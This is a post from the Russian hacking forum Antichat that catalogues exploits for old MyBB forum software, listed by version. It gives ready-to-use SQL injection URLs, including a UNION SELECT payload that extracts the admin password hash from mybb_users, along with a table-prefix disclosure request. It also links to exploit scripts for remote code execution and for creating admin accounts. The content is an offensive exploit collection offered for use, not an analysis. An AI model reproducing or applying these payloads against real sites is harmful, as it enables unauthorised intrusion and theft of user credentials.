Форум АНТИЧАТ - Показать сообщение отдельно

MyBB <= 1.00 RC4
SQL Injection Exploit

Exploit:
http://milw0rm.org/exploits/1022
http://milw0rm.org/exploits/1172

MyBB 1.0.2
Название префикса таблиц

Код:

http://www.example.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3

MyBB 1.03
SQL-иньекция
[CODE]http://www.example.com/moderation.php?posts=[pid]|

Код:

&tid=[pid]&action=do_multimergeposts&sep=hr

MyBB <= 1.04
SQL-иньекция

Exploit:
http://www.security.nnov.ru/files/mybbex.pl

MyBB <= 1.1.2
SQL-иньекция

Код:

http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/*

MyBB 1.1.2
remote code execution

Exploit:
http://www.security.nnov.ru/files/mybibi.pl

MyBB <= 1.1.3
Create An Admin Exploit

Exploit:
http://milw0rm.org/exploits/1950

MyBB <= 1.1.5
'CLIENT-IP' SQL injection / create new admin exploit
Exploit:
http://www.security.nnov.ru/files/mybbsipsql.php